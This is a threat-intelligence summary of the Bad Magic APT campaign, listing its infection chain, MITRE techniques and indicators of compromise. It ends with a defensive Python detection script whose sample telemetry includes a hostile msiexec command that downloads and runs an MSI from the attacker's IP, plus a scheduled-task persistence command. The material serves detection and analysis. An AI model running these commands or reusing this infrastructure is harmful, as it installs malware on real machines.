Bad Magic is an APT campaign tied to the Russo-Ukrainian conflict that delivers a modular malware stack. The chain starts with a ZIP archive reached through a phishing-style lure; the archive holds a malicious LNK that leads to an MSI dropper. From there the operation unfolds as PowerShell-based loaders and the PowerMagic backdoor, which uses a cloud-based C2 channel over OneDrive/Dropbox, followed by the CommonMagic framework for modular tasks. #PowerMagic #CommonMagic #BadMagicAPT #OneDrive #MicrosoftGraphAPI #PowerShell #Msiexec #webservice-srv.online #webservice-srv1.online #185.166.217.184 #Donetsk #Lugansk #Crimea
Keypoints
- Active cyber operations tied to the Russo-Ukrainian conflict have been observed targeting government, agriculture, and transportation sectors in Donetsk, Lugansk, and Crimea.
- The initial compromise likely involved spearphishing or similar methods, leading victims to a ZIP archive hosted on a malicious server containing a decoy document and a double-extension LNK file.
- Opening the LNK in the archive triggers infection via a Windows MSI dropper that downloads and runs a next-stage payload (service_pack.dat) and a decoy document.
- The dropper decrypts the next stage with a multi-step XOR process, executes a PowerShell-based loader, and then cleans up disk artifacts.
- The main PowerMagic backdoor uses a mutex (WinEventCom), runs commands via PowerShell, and communicates with C2 through cloud storage (OneDrive/Dropbox) using the Microsoft Graph API and OAuth tokens.
- A modular framework named CommonMagic is deployed after PowerMagic, featuring multiple executable modules, named pipes, and plugins (e.g., Screenshot and USB data collection) to expand capabilities.
MITRE Techniques
- [T1566.002] Phishing: Spearphishing Link – Victims were lured to a URL serving a ZIP archive from a malicious web server; the archive held a decoy document and a malicious LNK. “The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server. The archive, in turn, contained two files:”
- [T1204.002] User Execution: Malicious File – The LNK inside the archive carries a double extension (e.g., .pdf.lnk) so it passes for a document, and opening it starts the infection. “a malicious LNK file with a double extension (e.g., .pdf.lnk) that leads to infection when opened”
- [T1218.005] Signed Binary Proxy Execution: Msiexec – The MSI file is downloaded and started by the Windows Installer executable. “The MSI file is effectively a dropper package, containing an encrypted next-stage payload (service_pack.dat), a dropper script (runservice_pack.vbs) and a decoy document that is supposed to be displayed to the victim.”
- [T1027] Obfuscated/Encrypted Files and Information – Decryption of service_pack.dat using a multi-step XOR routine before execution. “The decrypted payload is obtained by decrypting service_pack.dat via an XOR-based scheme.”
- [T1059.001] Command and Scripting Interpreter: PowerShell – The dropper’s embedded PowerShell decrypts and runs the next stage. “a wrapper for launching an embedded PowerShell script that decrypts the next stage using a simple one-byte XOR, launches it and deletes it from disk.”
- [T1053.005] Scheduled Task – Creation of a daily Task Scheduler job WindowsActiveXTaskTrigger to execute the VBS launcher. “creates a Task Scheduler job named WindowsActiveXTaskTrigger, to execute the
- [T1071.001] Web Protocols – Command and control is carried over web requests to OneDrive through the Microsoft Graph API. “The framework uses OneDrive remote folders as a transport. It utilizes the Microsoft Graph API using an OAuth refresh token embedded into the module binary for authentication.”
- [T1071.004] Web Protocols: Cloud Storage – Data exchange with the operator through cloud services (OneDrive/Dropbox) and RC5Simple-based encryption. “The data exchanged with the operator via the OneDrive location is encrypted using the RC5Simple open-source library.”
Indicators of Compromise
- [Domain] webservice-srv.online, webservice-srv1.online – domains hosting ZIP archives used in the initial delivery
- [IP] 185.166.217.184 – host serving the MSI dropper (attachment.msi); the full URL is shown in the article
- [MD5] 0a95a985e6be0918fdb4bfabf0847b5a, ecb7af5771f4fe36a3065dc4d5516d84, and 2 more hashes – MD5 hashes of lure archives
- [File name] attachment.msi, service_pack.dat, manutil.vbs – core artifacts in the PowerMagic dropper and loader chain
- [Mutex] WinEventCom – mutex created by the backdoor
- [URL] http://185.166.217.184/CFVJKXIUPHESRHUSE4FHUREHUIFERAY97A4FXA/attachment.msi, https://content.dropboxapi.com/2/files/upload, https://content.dropboxapi.com/2/files/download – dropper download URL (attachment.msi) and the Dropbox API endpoints used for C2
- [Path] %APPDATA%\WinEventCom – directory used to store payloads and scripts
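As an added defender-side example (not from the Securelist report or this summary), the following Python script turns the techniques and indicators listed above into simple detection rules and runs them over constructed EDR-style event lines, then requires several distinct techniques to fire before flagging a host. It generalises the double-extension check beyond .pdf.lnk to other document extensions; the event field names (type, image, cmdline, target, path, mutex, host) and the use of schtasks.exe to create the task are assumptions.

```python
import re

# Detection rules derived from the behaviours and indicators summarised above.
# Each entry: (rule name, MITRE technique as listed above or an IoC label, regex); the
# regex is applied to one flattened "field=value" event line at a time.
RULES = [
    ("double_extension_lnk", "T1204.002",  # generalised beyond .pdf.lnk to other doc types
     re.compile(r"\.(pdf|docx?|xlsx?)\.lnk\b", re.I)),
    ("msiexec_remote_attachment", "T1218.005",
     re.compile(r"msiexec\.exe.*(185\.166\.217\.184|webservice-srv1?\.online|attachment\.msi)", re.I)),
    ("dropper_artifacts", "T1027",
     re.compile(r"service_pack\.dat|runservice_pack\.vbs|manutil\.vbs", re.I)),
    ("wineventcom_staging_dir", "T1059.001",  # %APPDATA% expands to ...\AppData\Roaming
     re.compile(r"\\AppData\\Roaming\\WinEventCom\\", re.I)),
    ("scheduled_task_trigger", "T1053.005", re.compile(r"WindowsActiveXTaskTrigger", re.I)),
    ("mutex_wineventcom", "IoC-Mutex", re.compile(r"\bmutex=\S*WinEventCom\b", re.I)),
    ("dropbox_content_api", "T1071.004",
     re.compile(r"content\.dropboxapi\.com/2/files/(upload|download)", re.I)),
]

# Constructed sample telemetry (hypothetical EDR/Sysmon-style records; field names assumed).
SAMPLE_EVENTS = [
    'type=process image=C:\\Reader\\reader.exe cmdline="reader.exe C:\\Users\\u\\Downloads\\report.pdf"',  # benign
    'type=process image=C:\\Windows\\explorer.exe target="C:\\Users\\u\\Downloads\\archive\\Scan_12.pdf.lnk"',
    'type=process image=C:\\Windows\\System32\\msiexec.exe cmdline="msiexec /i http://185.166.217.184/CFVJKXIUPHESRHUSE4FHUREHUIFERAY97A4FXA/attachment.msi /q"',
    'type=file path="C:\\Users\\u\\AppData\\Roaming\\WinEventCom\\service_pack.dat"',
    'type=process image=C:\\Windows\\System32\\schtasks.exe cmdline="schtasks /create /sc daily /tn WindowsActiveXTaskTrigger /tr manutil.vbs"',
    'type=mutex mutex=WinEventCom pid=4120',
    'type=network host=content.dropboxapi.com url=https://content.dropboxapi.com/2/files/upload',
]

def scan_event(event):
    """Return [(rule name, technique)] for every rule that fires on one event line."""
    return [(name, tech) for name, tech, rx in RULES if rx.search(event)]

def scan_log(lines):
    """Map line index -> matches for every line with at least one hit."""
    return {i: m for i, line in enumerate(lines) if (m := scan_event(line))}

def triage(lines, threshold=2):
    """Flag the host only when `threshold` or more distinct techniques fire: a lone hit such
    as Dropbox API traffic is common in benign activity, whereas the chain above stacks several."""
    techniques = {tech for matches in scan_log(lines).values() for _, tech in matches}
    return len(techniques) >= threshold, sorted(techniques)

if __name__ == "__main__":
    for idx, matches in scan_log(SAMPLE_EVENTS).items():
        print(idx, matches)
    print(triage(SAMPLE_EVENTS))
```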
Read more: https://securelist.com/bad-magic-apt/109087/